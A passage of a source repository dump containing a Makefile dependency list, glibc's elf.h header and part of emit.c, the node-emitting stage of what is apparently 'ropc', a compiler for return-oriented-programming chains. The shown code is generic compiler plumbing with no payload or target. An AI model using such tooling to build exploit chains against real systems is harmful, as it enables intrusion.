-------------------------------------------------------------------------------- 1 | # DO NOT DELETE 2 | 3 | lexer.o: config.h util.h lexer.h 4 | parser.o: config.h util.h parser.h lexer.h emit.h code.h backend.h symtab.h 5 | cycle.o: util.h code.h cycle.h 6 | code.o: config.h util.h lexer.h parser.h symtab.h cycle.h emit.h code.h backend.h 7 | emit.o: config.h util.h emit.h code.h symtab.h backend.h 8 | symtab.o: config.h util.h symtab.h 9 | backend.o: config.h util.h code.h backend.h symtab.h binary.h 10 | binary.o: elf.h binary.h 11 | util.o: config.h util.h lexer.h 12 | ropc.o: config.h util.h lexer.h parser.h code.h symtab.h backend.h 
13 | -------------------------------------------------------------------------------- /elf.h: -------------------------------------------------------------------------------- 1 | /* This file defines standard ELF types, structures, and macros. 2 | Copyright (C) 1995-2003, 2004 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, write to the Free 17 | Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 18 | 02111-1307 USA. */ 19 | 20 | #ifndef _ELF_H 21 | #define _ELF_H 1 22 | 23 | /*#include */ 24 | 25 | /*__BEGIN_DECLS*/ 26 | 27 | /* Standard ELF types. */ 28 | 29 | #include 30 | 31 | /* Type for a 16-bit quantity. */ 32 | typedef uint16_t Elf32_Half; 33 | typedef uint16_t Elf64_Half; 34 | 35 | /* Types for signed and unsigned 32-bit quantities. */ 36 | typedef uint32_t Elf32_Word; 37 | typedef int32_t Elf32_Sword; 38 | typedef uint32_t Elf64_Word; 39 | typedef int32_t Elf64_Sword; 40 | 41 | /* Types for signed and unsigned 64-bit quantities. */ 42 | typedef uint64_t Elf32_Xword; 43 | typedef int64_t Elf32_Sxword; 44 | typedef uint64_t Elf64_Xword; 45 | typedef int64_t Elf64_Sxword; 46 | 47 | /* Type of addresses. */ 48 | typedef uint32_t Elf32_Addr; 49 | typedef uint64_t Elf64_Addr; 50 | 51 | /* Type of file offsets. 
*/ 52 | typedef uint32_t Elf32_Off; 53 | typedef uint64_t Elf64_Off; 54 | 55 | /* Type for section indices, which are 16-bit quantities. */ 56 | typedef uint16_t Elf32_Section; 57 | typedef uint16_t Elf64_Section; 58 | 59 | 60 | /* The ELF file header. This appears at the start of every ELF file. */ 61 | 62 | #define EI_NIDENT (16) 63 | 64 | typedef struct 65 | { 66 | unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */ 67 | Elf32_Half e_type; /* Object file type */ 68 | Elf32_Half e_machine; /* Architecture */ 69 | Elf32_Word e_version; /* Object file version */ 70 | Elf32_Addr e_entry; /* Entry point virtual address */ 71 | Elf32_Off e_phoff; /* Program header table file offset */ 72 | Elf32_Off e_shoff; /* Section header table file offset */ 73 | Elf32_Word e_flags; /* Processor-specific flags */ 74 | Elf32_Half e_ehsize; /* ELF header size in bytes */ 75 | Elf32_Half e_phentsize; /* Program header table entry size */ 76 | Elf32_Half e_phnum; /* Program header table entry count */ 77 | Elf32_Half e_shentsize; /* Section header table entry size */ 78 | Elf32_Half e_shnum; /* Section header table entry count */ 79 | Elf32_Half e_shstrndx; /* Section header string table index */ 80 | } Elf32_Ehdr; 81 | 82 | typedef struct 83 | { 84 | unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */ 85 | Elf64_Half e_type; /* Object file type */ 86 | Elf64_Half e_machine; /* Architecture */ 87 | Elf64_Word e_version; /* Object file version */ 88 | Elf64_Addr e_entry; /* Entry point virtual address */ 89 | Elf64_Off e_phoff; /* Program header table file offset */ 90 | Elf64_Off e_shoff; /* Section header table file offset */ 91 | Elf64_Word e_flags; /* Processor-specific flags */ 92 | Elf64_Half e_ehsize; /* ELF header size in bytes */ 93 | Elf64_Half e_phentsize; /* Program header table entry size */ 94 | Elf64_Half e_phnum; /* Program header table entry count */ 95 | Elf64_Half e_shentsize; /* Section header table entry size */ 96 | Elf64_Half 
e_shnum; /* Section header table entry count */ 97 | Elf64_Half e_shstrndx; /* Section header string table index */ 98 | } Elf64_Ehdr; 99 | 100 | /* Fields in the e_ident array. The EI_* macros are indices into the 101 | array. The macros under each EI_* macro are the values the byte 102 | may have. */ 103 | 104 | #define EI_CLASS 4 /* File class byte index */ 105 | #define ELFCLASSNONE 0 /* Invalid class */ 106 | #define ELFCLASS32 1 /* 32-bit objects */ 107 | #define ELFCLASS64 2 /* 64-bit objects */ 108 | #define ELFCLASSNUM 3 109 | 110 | /* Legal values for e_type (object file type). */ 111 | 112 | #define ET_NONE 0 /* No file type */ 113 | #define ET_REL 1 /* Relocatable file */ 114 | #define ET_EXEC 2 /* Executable file */ 115 | #define ET_DYN 3 /* Shared object file */ 116 | #define ET_CORE 4 /* Core file */ 117 | #define ET_NUM 5 /* Number of defined types */ 118 | #define ET_LOOS 0xfe00 /* OS-specific range start */ 119 | #define ET_HIOS 0xfeff /* OS-specific range end */ 120 | #define ET_LOPROC 0xff00 /* Processor-specific range start */ 121 | #define ET_HIPROC 0xffff /* Processor-specific range end */ 122 | 123 | /* Section header. 
*/ 124 | 125 | typedef struct 126 | { 127 | Elf32_Word sh_name; /* Section name (string tbl index) */ 128 | Elf32_Word sh_type; /* Section type */ 129 | Elf32_Word sh_flags; /* Section flags */ 130 | Elf32_Addr sh_addr; /* Section virtual addr at execution */ 131 | Elf32_Off sh_offset; /* Section file offset */ 132 | Elf32_Word sh_size; /* Section size in bytes */ 133 | Elf32_Word sh_link; /* Link to another section */ 134 | Elf32_Word sh_info; /* Additional section information */ 135 | Elf32_Word sh_addralign; /* Section alignment */ 136 | Elf32_Word sh_entsize; /* Entry size if section holds table */ 137 | } Elf32_Shdr; 138 | 139 | typedef struct 140 | { 141 | Elf64_Word sh_name; /* Section name (string tbl index) */ 142 | Elf64_Word sh_type; /* Section type */ 143 | Elf64_Xword sh_flags; /* Section flags */ 144 | Elf64_Addr sh_addr; /* Section virtual addr at execution */ 145 | Elf64_Off sh_offset; /* Section file offset */ 146 | Elf64_Xword sh_size; /* Section size in bytes */ 147 | Elf64_Word sh_link; /* Link to another section */ 148 | Elf64_Word sh_info; /* Additional section information */ 149 | Elf64_Xword sh_addralign; /* Section alignment */ 150 | Elf64_Xword sh_entsize; /* Entry size if section holds table */ 151 | } Elf64_Shdr; 152 | 153 | /* Special section indices. */ 154 | 155 | #define SHN_UNDEF 0 /* Undefined section */ 156 | #define SHN_LORESERVE 0xff00 /* Start of reserved indices */ 157 | #define SHN_LOPROC 0xff00 /* Start of processor-specific */ 158 | #define SHN_BEFORE 0xff00 /* Order section before all others 159 | (Solaris). */ 160 | #define SHN_AFTER 0xff01 /* Order section after all others 161 | (Solaris). 
*/ 162 | #define SHN_HIPROC 0xff1f /* End of processor-specific */ 163 | #define SHN_LOOS 0xff20 /* Start of OS-specific */ 164 | #define SHN_HIOS 0xff3f /* End of OS-specific */ 165 | #define SHN_ABS 0xfff1 /* Associated symbol is absolute */ 166 | #define SHN_COMMON 0xfff2 /* Associated symbol is common */ 167 | #define SHN_XINDEX 0xffff /* Index is in extra table. */ 168 | #define SHN_HIRESERVE 0xffff /* End of reserved indices */ 169 | 170 | /* Legal values for sh_type (section type). */ 171 | 172 | #define SHT_NULL 0 /* Section header table entry unused */ 173 | #define SHT_PROGBITS 1 /* Program data */ 174 | #define SHT_SYMTAB 2 /* Symbol table */ 175 | #define SHT_STRTAB 3 /* String table */ 176 | #define SHT_RELA 4 /* Relocation entries with addends */ 177 | #define SHT_HASH 5 /* Symbol hash table */ 178 | #define SHT_DYNAMIC 6 /* Dynamic linking information */ 179 | #define SHT_NOTE 7 /* Notes */ 180 | #define SHT_NOBITS 8 /* Program space with no data (bss) */ 181 | #define SHT_REL 9 /* Relocation entries, no addends */ 182 | #define SHT_SHLIB 10 /* Reserved */ 183 | #define SHT_DYNSYM 11 /* Dynamic linker symbol table */ 184 | #define SHT_INIT_ARRAY 14 /* Array of constructors */ 185 | #define SHT_FINI_ARRAY 15 /* Array of destructors */ 186 | #define SHT_PREINIT_ARRAY 16 /* Array of pre-constructors */ 187 | #define SHT_GROUP 17 /* Section group */ 188 | #define SHT_SYMTAB_SHNDX 18 /* Extended section indeces */ 189 | #define SHT_NUM 19 /* Number of defined types. */ 190 | #define SHT_LOOS 0x60000000 /* Start OS-specific */ 191 | #define SHT_GNU_LIBLIST 0x6ffffff7 /* Prelink library list */ 192 | #define SHT_CHECKSUM 0x6ffffff8 /* Checksum for DSO content. */ 193 | #define SHT_LOSUNW 0x6ffffffa /* Sun-specific low bound. */ 194 | #define SHT_SUNW_move 0x6ffffffa 195 | #define SHT_SUNW_COMDAT 0x6ffffffb 196 | #define SHT_SUNW_syminfo 0x6ffffffc 197 | #define SHT_GNU_verdef 0x6ffffffd /* Version definition section. 
*/ 198 | #define SHT_GNU_verneed 0x6ffffffe /* Version needs section. */ 199 | #define SHT_GNU_versym 0x6fffffff /* Version symbol table. */ 200 | #define SHT_HISUNW 0x6fffffff /* Sun-specific high bound. */ 201 | #define SHT_HIOS 0x6fffffff /* End OS-specific type */ 202 | #define SHT_LOPROC 0x70000000 /* Start of processor-specific */ 203 | #define SHT_HIPROC 0x7fffffff /* End of processor-specific */ 204 | #define SHT_LOUSER 0x80000000 /* Start of application-specific */ 205 | #define SHT_HIUSER 0x8fffffff /* End of application-specific */ 206 | 207 | /* Legal values for sh_flags (section flags). */ 208 | 209 | #define SHF_WRITE (1 << 0) /* Writable */ 210 | #define SHF_ALLOC (1 << 1) /* Occupies memory during execution */ 211 | #define SHF_EXECINSTR (1 << 2) /* Executable */ 212 | #define SHF_MERGE (1 << 4) /* Might be merged */ 213 | #define SHF_STRINGS (1 << 5) /* Contains nul-terminated strings */ 214 | #define SHF_INFO_LINK (1 << 6) /* `sh_info' contains SHT index */ 215 | #define SHF_LINK_ORDER (1 << 7) /* Preserve order after combining */ 216 | #define SHF_OS_NONCONFORMING (1 << 8) /* Non-standard OS specific handling 217 | required */ 218 | #define SHF_GROUP (1 << 9) /* Section is member of a group. */ 219 | #define SHF_TLS (1 << 10) /* Section hold thread-local data. */ 220 | #define SHF_MASKOS 0x0ff00000 /* OS-specific. */ 221 | #define SHF_MASKPROC 0xf0000000 /* Processor-specific */ 222 | #define SHF_ORDERED (1 << 30) /* Special ordering requirement 223 | (Solaris). */ 224 | #define SHF_EXCLUDE (1 << 31) /* Section is excluded unless 225 | referenced or allocated (Solaris).*/ 226 | 227 | /* Symbol table entry. 
*/ 228 | 229 | typedef struct 230 | { 231 | Elf32_Word st_name; /* Symbol name (string tbl index) */ 232 | Elf32_Addr st_value; /* Symbol value */ 233 | Elf32_Word st_size; /* Symbol size */ 234 | unsigned char st_info; /* Symbol type and binding */ 235 | unsigned char st_other; /* Symbol visibility */ 236 | Elf32_Section st_shndx; /* Section index */ 237 | } Elf32_Sym; 238 | 239 | typedef struct 240 | { 241 | Elf64_Word st_name; /* Symbol name (string tbl index) */ 242 | unsigned char st_info; /* Symbol type and binding */ 243 | unsigned char st_other; /* Symbol visibility */ 244 | Elf64_Section st_shndx; /* Section index */ 245 | Elf64_Addr st_value; /* Symbol value */ 246 | Elf64_Xword st_size; /* Symbol size */ 247 | } Elf64_Sym; 248 | 249 | /* How to extract and insert information held in the st_info field. */ 250 | 251 | #define ELF32_ST_BIND(val) (((unsigned char) (val)) >> 4) 252 | #define ELF32_ST_TYPE(val) ((val) & 0xf) 253 | #define ELF32_ST_INFO(bind, type) (((bind) << 4) + ((type) & 0xf)) 254 | 255 | /* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */ 256 | #define ELF64_ST_BIND(val) ELF32_ST_BIND (val) 257 | #define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val) 258 | #define ELF64_ST_INFO(bind, type) ELF32_ST_INFO ((bind), (type)) 259 | 260 | /* Legal values for ST_BIND subfield of st_info (symbol binding). */ 261 | 262 | #define STB_LOCAL 0 /* Local symbol */ 263 | #define STB_GLOBAL 1 /* Global symbol */ 264 | #define STB_WEAK 2 /* Weak symbol */ 265 | #define STB_NUM 3 /* Number of defined types. */ 266 | #define STB_LOOS 10 /* Start of OS-specific */ 267 | #define STB_HIOS 12 /* End of OS-specific */ 268 | #define STB_LOPROC 13 /* Start of processor-specific */ 269 | #define STB_HIPROC 15 /* End of processor-specific */ 270 | 271 | /* Legal values for ST_TYPE subfield of st_info (symbol type). 
*/ 272 | 273 | #define STT_NOTYPE 0 /* Symbol type is unspecified */ 274 | #define STT_OBJECT 1 /* Symbol is a data object */ 275 | #define STT_FUNC 2 /* Symbol is a code object */ 276 | #define STT_SECTION 3 /* Symbol associated with a section */ 277 | #define STT_FILE 4 /* Symbol's name is file name */ 278 | #define STT_COMMON 5 /* Symbol is a common data object */ 279 | #define STT_TLS 6 /* Symbol is thread-local data object*/ 280 | #define STT_NUM 7 /* Number of defined types. */ 281 | #define STT_LOOS 10 /* Start of OS-specific */ 282 | #define STT_HIOS 12 /* End of OS-specific */ 283 | #define STT_LOPROC 13 /* Start of processor-specific */ 284 | #define STT_HIPROC 15 /* End of processor-specific */ 285 | 286 | 287 | /* Program segment header. */ 288 | 289 | typedef struct 290 | { 291 | Elf32_Word p_type; /* Segment type */ 292 | Elf32_Off p_offset; /* Segment file offset */ 293 | Elf32_Addr p_vaddr; /* Segment virtual address */ 294 | Elf32_Addr p_paddr; /* Segment physical address */ 295 | Elf32_Word p_filesz; /* Segment size in file */ 296 | Elf32_Word p_memsz; /* Segment size in memory */ 297 | Elf32_Word p_flags; /* Segment flags */ 298 | Elf32_Word p_align; /* Segment alignment */ 299 | } Elf32_Phdr; 300 | 301 | typedef struct 302 | { 303 | Elf64_Word p_type; /* Segment type */ 304 | Elf64_Word p_flags; /* Segment flags */ 305 | Elf64_Off p_offset; /* Segment file offset */ 306 | Elf64_Addr p_vaddr; /* Segment virtual address */ 307 | Elf64_Addr p_paddr; /* Segment physical address */ 308 | Elf64_Xword p_filesz; /* Segment size in file */ 309 | Elf64_Xword p_memsz; /* Segment size in memory */ 310 | Elf64_Xword p_align; /* Segment alignment */ 311 | } Elf64_Phdr; 312 | 313 | /* Legal values for p_type (segment type). 
*/ 314 | 315 | #define PT_NULL 0 /* Program header table entry unused */ 316 | #define PT_LOAD 1 /* Loadable program segment */ 317 | #define PT_DYNAMIC 2 /* Dynamic linking information */ 318 | #define PT_INTERP 3 /* Program interpreter */ 319 | #define PT_NOTE 4 /* Auxiliary information */ 320 | #define PT_SHLIB 5 /* Reserved */ 321 | #define PT_PHDR 6 /* Entry for header table itself */ 322 | #define PT_TLS 7 /* Thread-local storage segment */ 323 | #define PT_NUM 8 /* Number of defined types */ 324 | #define PT_LOOS 0x60000000 /* Start of OS-specific */ 325 | #define PT_GNU_EH_FRAME 0x6474e550 /* GCC .eh_frame_hdr segment */ 326 | #define PT_GNU_STACK 0x6474e551 /* Indicates stack executability */ 327 | #define PT_GNU_RELRO 0x6474e552 /* Read-only after relocation */ 328 | #define PT_LOSUNW 0x6ffffffa 329 | #define PT_SUNWBSS 0x6ffffffa /* Sun Specific segment */ 330 | #define PT_SUNWSTACK 0x6ffffffb /* Stack segment */ 331 | #define PT_HISUNW 0x6fffffff 332 | #define PT_HIOS 0x6fffffff /* End of OS-specific */ 333 | #define PT_LOPROC 0x70000000 /* Start of processor-specific */ 334 | #define PT_HIPROC 0x7fffffff /* End of processor-specific */ 335 | 336 | /* Legal values for p_flags (segment flags). 
*/ 337 | 338 | #define PF_X (1 << 0) /* Segment is executable */ 339 | #define PF_W (1 << 1) /* Segment is writable */ 340 | #define PF_R (1 << 2) /* Segment is readable */ 341 | #define PF_MASKOS 0x0ff00000 /* OS-specific */ 342 | #define PF_MASKPROC 0xf0000000 /* Processor-specific */ 343 | 344 | /*__END_DECLS*/ 345 | 346 | #endif /* elf.h */ 347 | -------------------------------------------------------------------------------- /emit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "config.h" 5 | #include "util.h" 6 | #include "emit.h" 7 | #include "code.h" 8 | #include "symtab.h" 9 | #include "backend.h" 10 | 11 | 12 | struct call_node * 13 | alloc_call_node(void) 14 | { 15 | struct call_node *n = xmalloc(sizeof(struct call_node)); 16 | n->next = NULL; 17 | n->type = NODE_CALL; 18 | n->inverse = 0; 19 | return n; 20 | } 21 | 22 | 23 | struct imm_node * 24 | alloc_imm_node(void) 25 | { 26 | struct imm_node *n = xmalloc(sizeof(struct imm_node)); 27 | n->next = NULL; 28 | n->type = NODE_IMM; 29 | n->inverse = 0; 30 | return n; 31 | } 32 | 33 | 34 | struct lval_node * 35 | alloc_lval_node(void) 36 | { 37 | struct lval_node *n = xmalloc(sizeof(struct lval_node)); 38 | n->next = NULL; 39 | n->type = NODE_LVAL; 40 | n->inverse = 0; 41 | return n; 42 | } 43 | 44 | 45 | struct or_node * 46 | alloc_or_node(void) 47 | { 48 | struct or_node *n = xmalloc(sizeof(struct or_node)); 49 | n->next = NULL; 50 | n->type = NODE_OR; 51 | n->inverse = 0; 52 | return n; 53 | } 54 | 55 | 56 | struct xor_node * 57 | alloc_xor_node(void) 58 | { 59 | struct xor_node *n = xmalloc(sizeof(struct xor_node)); 60 | n->next = NULL; 61 | n->type = NODE_XOR; 62 | n->inverse = 0; 63 | return n; 64 | } 65 | 66 | 67 | struct and_node * 68 | alloc_and_node(void) 69 | { 70 | struct and_node *n = xmalloc(sizeof(struct and_node)); 71 | n->next = NULL; 72 | n->type = NODE_AND; 73 | n->inverse = 0; 74 | return n; 75 | } 76 
| 77 | 78 | struct add_node * 79 | alloc_add_node(void) 80 | { 81 | struct add_node *n = xmalloc(sizeof(struct add_node)); 82 | n->next = NULL; 83 | n->type = NODE_ADD; 84 | n->inverse = 0; 85 | return n; 86 | } 87 | 88 | 89 | struct mul_node * 90 | alloc_mul_node(void) 91 | { 92 | struct mul_node *n = xmalloc(sizeof(struct mul_node)); 93 | n->next = NULL; 94 | n->type = NODE_MUL; 95 | n->inverse = 0; 96 | return n; 97 | } 98 | 99 | 100 | void 101 | free_nodes(struct node *n) 102 | { 103 | while (n) { 104 | struct node *next = n->next; 105 | switch (n->type) { 106 | case NODE_IMM: { 107 | struct imm_node *p = (struct imm_node *)n; 108 | free(p->value); 109 | break; 110 | } 111 | case NODE_LVAL: { 112 | struct lval_node *p = (struct lval_node *)n; 113 | free(p->name); 114 | break; 115 | } 116 | case NODE_CALL: { 117 | struct call_node *p = (struct call_node *)n; 118 | free(p->func); 119 | if (p->parm) { 120 | free_nodes(p->parm); 121 | } 122 | break; 123 | } 124 | case NODE_OR: { 125 | struct or_node *p = (struct or_node *)n; 126 | if (p->list) { 127 | free_nodes(p->list); 128 | } 129 | break; 130 | } 131 | case NODE_XOR: { 132 | struct xor_node *p = (struct xor_node *)n; 133 | if (p->list) { 134 | free_nodes(p->list); 135 | } 136 | break; 137 | } 138 | case NODE_AND: { 139 | struct and_node *p = (struct and_node *)n; 140 | if (p->list) { 141 | free_nodes(p->list); 142 | } 143 | break; 144 | } 145 | case NODE_ADD: { 146 | struct add_node *p = (struct add_node *)n; 147 | if (p->list) { 148 | free_nodes(p->list); 149 | } 150 | break; 151 | } 152 | case NODE_MUL: { 153 | struct mul_node *p = (struct mul_node *)n; 154 | if (p->list) { 155 | free_nodes(p->list); 156 | } 157 | break; 158 | } 159 | } 160 | free(n); 161 | n = next; 162 | } 163 | } 164 | 165 | 166 | #ifdef DATA_DEBUG 167 | #include 168 | 169 | 170 | #define show(args...) 
do { if (level) printf("%*c", level * 2, ' '); printf(args); } while (0) 171 | 172 | 173 | void 174 | walk_nodes(struct node *n, int level) 175 | { 176 | while (n) { 177 | switch (n->type) { 178 | case NODE_IMM: { 179 | struct imm_node *p = (struct imm_node *)n; 180 | show(";== imm %s\n", p->value); 181 | break; 182 | } 183 | case NODE_LVAL: { 184 | struct lval_node *p = (struct lval_node *)n; 185 | show(";== lval %s%s\n", p->deref ? "*" : "", p->name); 186 | break; 187 | } 188 | case NODE_CALL: { 189 | struct call_node *p = (struct call_node *)n; 190 | show(";== %s(\n", p->func); 191 | if (p->parm) { 192 | walk_nodes(p->parm, level + 1); 193 | } 194 | show(")\n"); 195 | break; 196 | } 197 | case NODE_OR: { 198 | struct or_node *p = (struct or_node *)n; 199 | if (p->list) { 200 | show(";== |(\n"); 201 | walk_nodes(p->list, level + 1); 202 | show(")\n"); 203 | } 204 | break; 205 | } 206 | case NODE_XOR: { 207 | struct xor_node *p = (struct xor_node *)n; 208 | if (p->list) { 209 | show(";== ^(\n"); 210 | walk_nodes(p->list, level + 1); 211 | show(")\n"); 212 | } 213 | break; 214 | } 215 | case NODE_AND: { 216 | struct and_node *p = (struct and_node *)n; 217 | if (p->list) { 218 | show(";== &(\n"); 219 | walk_nodes(p->list, level + 1); 220 | show(")\n"); 221 | } 222 | break; 223 | } 224 | case NODE_ADD: { 225 | struct add_node *p = (struct add_node *)n; 226 | if (p->list) { 227 | show(";== +(\n"); 228 | walk_nodes(p->list, level + 1); 229 | show(")\n"); 230 | } 231 | break; 232 | } 233 | case NODE_MUL: { 234 | struct mul_node *p = (struct mul_node *)n; 235 | if (p->list) { 236 | show(";== .(\n"); 237 | walk_nodes(p->list, level + 1); 238 | show(")\n"); 239 | } 240 | break; 241 | } 242 | } 243 | n = n->next; 244 | } 245 | } 246 | #endif 247 | 248 | 249 | static BOOL 250 | is_loadable_sym(const char *name) 251 | { 252 | enum use_t u = get_symbol_used(name); 253 | if (u != UNUSED) { 254 | if (u == CLOBBERED) { 255 | // XXX gets reported twice 256 | cry("symbol '%s' 
should be volatile\n", name); 257 | } 258 | return FALSE; 259 | } 260 | if (try_symbol_attr(name) & ATTRIB_VOLATILE) { 261 | return FALSE; 262 | } 263 | return TRUE; 264 | } 265 | 266 | 267 | static int 268 | is_loadable(struct node *n, BOOL allow_deref) 269 | { 270 | struct lval_node *p = (struct lval_node *)n; 271 | if (!is_loadable_sym(p->name)) { 272 | return 0; 273 | } 274 | if (p->deref && !allow_deref) { 275 | return 0; 276 | } 277 | if (!p->deref && try_symbol_extern(p->name)) { 278 | cry("symbol '%s' is actually an address\n", p->name); 279 | return -1; 280 | } 281 | return 1; 282 | } 283 | 284 | 285 | static int 286 | get_regparm(struct call_node *n) 287 | { 288 | int regparm; 289 | if ((n->attr & ATTRIB_REGPARM) && n->regparm >= 0) { 290 | return n->regparm; 291 | } 292 | regparm = try_symbol_regparm(n->func); 293 | if (regparm >= 0) { 294 | return regparm; 295 | } 296 | return arch_regparm; 297 | } 298 | 299 | 300 | static void 301 | maybe_symbol_forward(const char *arg) 302 | { 303 | char *tmp = copy_address_sym(arg); 304 | if (tmp) { 305 | add_symbol_forward(tmp, 0); 306 | if (try_symbol_extern(tmp)) { 307 | die("symbol '%s' is actually an address\n", tmp); 308 | } 309 | if (try_symbol_attr(tmp) & ATTRIB_CONSTANT) { 310 | cry("taking address of constant variable '%s'\n", tmp); 311 | } 312 | free(tmp); 313 | } 314 | } 315 | 316 | 317 | void 318 | emit_nodes(struct node *n, const char *assignto, BOOL force, BOOL inloop) 319 | { 320 | char *fast = NULL; 321 | 322 | assert(n); 323 | 324 | if (n->next == NULL && n->type != NODE_CALL && !assignto && !force) { 325 | /* do not emit single node, unless it is a call or we really need it */ 326 | cry("statement with no effect\n"); 327 | return; 328 | } 329 | switch (n->type) { 330 | case NODE_IMM: { 331 | fast = AS_IMM(n)->value; 332 | maybe_symbol_forward(fast); 333 | if (force) { 334 | cry("constant expression '%s' in conditional\n", fast); 335 | } 336 | assert(!assignto); 337 | break; 338 | } 339 | case 
NODE_LVAL: { 340 | struct lval_node *p = AS_LVAL(n); 341 | int loadable = is_loadable(n, TRUE); 342 | if (loadable < 0) { 343 | fast = p->name; 344 | } else if (loadable > 0) { 345 | make_symbol_used(p->name); 346 | emit_load_direct(p->name, p->deref); 347 | } else { 348 | emit_load_indirect(p->name, p->deref); 349 | } 350 | break; 351 | } 352 | case NODE_CALL: { 353 | struct call_node *p = AS_CALL(n); 354 | struct node *parm; 355 | int deref0 = 0; 356 | char *args[MAX_FUNC_ARGS]; 357 | char *func = p->func; 358 | int i; 359 | int regparm = get_regparm(p); 360 | BOOL retval = (n->next != NULL) || force || assignto; 361 | BOOL direct = FALSE; 362 | memset(args, 0, sizeof(args)); 363 | for (i = 0, parm = p->parm; parm; parm = parm->next, i++) { 364 | BOOL r0 = (i == 0 && regparm > 0); 365 | assert(i < MAX_FUNC_ARGS); 366 | if (parm->type == NODE_IMM) { 367 | args[i] = xstrdup(AS_IMM(parm)->value); 368 | maybe_symbol_forward(args[i]); 369 | } else if (parm->type == NODE_LVAL && is_loadable(parm, r0)) { 370 | struct lval_node *q = AS_LVAL(parm); 371 | args[i] = xstrdup(q->name); 372 | make_symbol_used(args[i]); 373 | if (q->deref) { 374 | deref0 = 1; 375 | } 376 | } else if (r0 && parm->next == NULL && is_loadable_sym(func)) { 377 | args[i] = NULL; 378 | direct = TRUE; 379 | emit_nodes(parm, NULL, TRUE, inloop); 380 | } else if (r0 && parm->type == NODE_LVAL) { 381 | struct lval_node *q = AS_LVAL(parm); 382 | args[i] = create_address_str(q->name, 0); 383 | deref0 = 1; 384 | if (q->deref) { 385 | deref0++; 386 | } 387 | } else { 388 | args[i] = new_name("var"); 389 | emit_nodes(parm, args[i], FALSE, inloop); 390 | make_symbol_used(args[i]); 391 | } 392 | } 393 | if (retval && (p->attr & ATTRIB_NORETURN)) { 394 | cry("function '%s' does not return\n", func); 395 | } 396 | if (!is_loadable_sym(func)) { 397 | char *ptr = new_name("ptr"); 398 | emit_load_indirect(func, FALSE); 399 | add_symbol_forward(ptr, 0); 400 | emit_store_indirect(ptr); 401 | func = ptr; 402 | } else { 
403 | func = xstrdup(func); 404 | } 405 | make_symbol_used(func); 406 | if (!(p->attr & ATTRIB_NORETURN)) { 407 | if ((p->attr & ATTRIB_STACK) || inloop) { 408 | if (!(p->attr & ATTRIB_STACK)) { 409 | cry("reserved [[stack]] for '%s' because of loop\n", func); 410 | } 411 | mark_all_used(PROTECTED); 412 | } else { 413 | mark_all_used(CLOBBERED); 414 | } 415 | } 416 | if (direct) { 417 | emit_call(func, NULL, 1, deref0, inloop, retval, p->attr, regparm, p->restack); 418 | } else { 419 | emit_call(func, args, i, deref0, inloop, retval, p->attr, regparm, p->restack); 420 | } 421 | free(func); 422 | while (--i >= 0) { 423 | free(args[i]); 424 | } 425 | break; 426 | } 427 | case NODE_MUL: 428 | case NODE_OR: 429 | case NODE_XOR: 430 | case NODE_AND: 431 | case NODE_ADD: { 432 | struct node *term; 433 | struct node *prev; 434 | int deref0 = 0; 435 | char *prev_tmp; 436 | prev = AS_ADD(n)->list; 437 | if (prev->type == NODE_IMM) { 438 | prev_tmp = xstrdup(AS_IMM(prev)->value); 439 | maybe_symbol_forward(prev_tmp); 440 | } else if (prev->type == NODE_LVAL && is_loadable(prev, TRUE)) { 441 | prev_tmp = xstrdup(AS_LVAL(prev)->name); 442 | make_symbol_used(prev_tmp); 443 | if (AS_LVAL(prev)->deref) { 444 | deref0 = TRUE; 445 | } 446 | } else if (prev->type == NODE_LVAL) { 447 | prev_tmp = create_address_str(AS_LVAL(prev)->name, 0); 448 | deref0 = 1; 449 | if (AS_LVAL(prev)->deref) { 450 | deref0++; 451 | } 452 | } else { 453 | prev_tmp = new_name("var"); 454 | emit_nodes(prev, prev_tmp, FALSE, inloop); 455 | make_symbol_used(prev_tmp); 456 | } 457 | for (term = prev->next; term; term = term->next) { 458 | BOOL swap = FALSE; 459 | char *tmp; 460 | char *sum = new_name("sum"); 461 | if (term->type == NODE_IMM) { 462 | tmp = xstrdup(AS_IMM(term)->value); 463 | maybe_symbol_forward(tmp); 464 | } else if (term->type == NODE_LVAL && is_loadable(term, !deref0) && !(term->inverse && AS_LVAL(term)->deref)) { 465 | tmp = xstrdup(AS_LVAL(term)->name); 466 | make_symbol_used(tmp); 467 | 
if (AS_LVAL(term)->deref) { 468 | swap = TRUE; 469 | deref0 = 1; 470 | } 471 | } else if (term->type == NODE_LVAL && !deref0 && !term->inverse) { 472 | tmp = create_address_str(AS_LVAL(term)->name, 0); 473 | swap = TRUE; 474 | deref0 = 1; 475 | if (AS_LVAL(term)->deref) { 476 | deref0++; 477 | } 478 | } else { 479 | tmp = new_name("var"); 480 | emit_nodes(term, tmp, FALSE, inloop); 481 | make_symbol_used(tmp); 482 | } 483 | if (n->type == NODE_MUL) { 484 | if (term->inverse) { 485 | emit_div(prev_tmp, tmp, deref0); 486 | } else { 487 | emit_mul(prev_tmp, tmp, deref0, swap); 488 | } 489 | } else if (n->type == NODE_OR) { 490 | emit_or(prev_tmp, tmp, deref0, swap); 491 | } else if (n->type == NODE_XOR) { 492 | emit_xor(prev_tmp, tmp, deref0, swap); 493 | } else if (n->type == NODE_AND) { 494 | emit_and(prev_tmp, tmp, deref0, swap); 495 | } else { 496 | if (term->inverse) { 497 | emit_sub(prev_tmp, tmp, deref0); 498 | } else { 499 | emit_add(prev_tmp, tmp, deref0, swap); 500 | } 501 | } 502 | deref0 = 0; 503 | if (term->next) { 504 | add_symbol_forward(sum, 0); 505 | emit_store_indirect(sum); 506 | make_symbol_used(sum); 507 | } 508 | free(prev_tmp); 509 | prev_tmp = sum; 510 | free(tmp); 511 | } 512 | free(prev_tmp); 513 | break; 514 | } 515 | } 516 | if (assignto) { 